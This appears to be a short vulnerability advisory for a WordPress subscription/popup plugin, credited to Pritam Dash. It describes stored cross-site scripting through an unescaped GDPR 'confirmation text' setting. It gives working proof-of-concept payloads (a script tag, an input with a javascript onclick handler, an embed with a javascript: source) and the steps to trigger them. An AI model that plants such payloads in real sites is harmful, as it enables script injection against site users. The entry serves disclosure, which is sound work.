The plugin does not escape and sanitize some settings, which could allow high privilege users to perform Stored Cross-Site Scripting attacks when the unfiltred_html is disallowed
Create/edit a subscription, enabled the GDPR options in it and add the following payload in the "confirmation text" settings: v < 4.1.10 - <script>alert(/XSS/)</script> v <= 4.1.10: <input class='js-subs-submit-btn' onclick='javascript:alert(/XSS/)' type='submit' value='Subscribe' style='width:300px;height:40px;background-color:#007fe1 !important;color:#FFFFFF;border-radius:4px !important;border-width:0px !important;border-color:#007fe1 !important;text-transform:none !important;border-style:solid'/> <embed src='javascript:alert(/XSS/)'> (<- will only works in the backend, when updating the Popup and the confirmation text changed) The XSS will be triggered when viewing/previewing the subscription popup (and clicking on the Subscribe button for version >= 4.1.10)
Pritam Dash
Pritam Dash
Yes
2022-06-20 (about 2 months ago)
2022-06-20 (about 2 months ago)
2022-06-20 (about 2 months ago)